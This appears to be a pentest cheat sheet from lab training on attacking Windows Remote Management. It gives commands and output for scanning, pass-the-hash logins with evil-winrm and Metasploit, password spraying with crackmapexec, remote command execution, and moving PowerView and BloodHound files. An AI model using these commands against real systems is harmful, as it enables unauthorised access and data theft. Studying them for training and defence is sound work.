WinRM (5985, 5986)
Nmap
nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n
Connect
evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!
evil-winrm -u "$USER" -H "$NT_HASH" -i "$TARGET"`
With docker
docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 10.129.111.232 -u Administrator -p 'password'
Metasploit
msf6 auxiliary(scanner/winrm/winrm_login) > set rhosts 192.168.210.17
rhosts => 192.168.210.17
msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME Administrator
USERNAME => Administrator
msf6 auxiliary(scanner/winrm/winrm_login) > set DOMAIN internal.zsm.local
DOMAIN => internal.zsm.local
msf6 auxiliary(scanner/winrm/winrm_login) > set PASSWORD aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
PASSWORD => aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
msf6 auxiliary(scanner/winrm/winrm_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 192.168.210.17:5985 - Login Successful:
Netexec - CME
NetExec - CME$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)
Command execution
[Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\'
SMB 10.129.202.136 445 WINSRV [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM 10.129.202.136 5985 WINSRV [+] WINSRV\john:november (admin)
WINRM 10.129.202.136 5985 WINSRV [+] Executed command (shell type: powershell)
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Directory: C:\
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Mode LastWriteTime Length Name
WINRM 10.129.202.136 5985 WINSRV ---- ------------- ------ ----
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM PerfLogs
WINRM 10.129.202.136 5985 WINSRV d-r--- 12/14/2020 6:38 PM Program Files
WINRM 10.129.202.136 5985 WINSRV d----- 2/11/2022 6:10 AM Program Files (x86)
WINRM 10.129.202.136 5985 WINSRV d-r--- 1/6/2022 6:49 AM Users
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM Windows
WINRM 10.129.202.136 5985 WINSRV
[Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace #
Upload
*Evil-WinRM* PS C:\Users\Administrator\Documents> upload PowerView.ps1 C:\Users\Administrator\Desktop
Download
.Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip
References
Last updated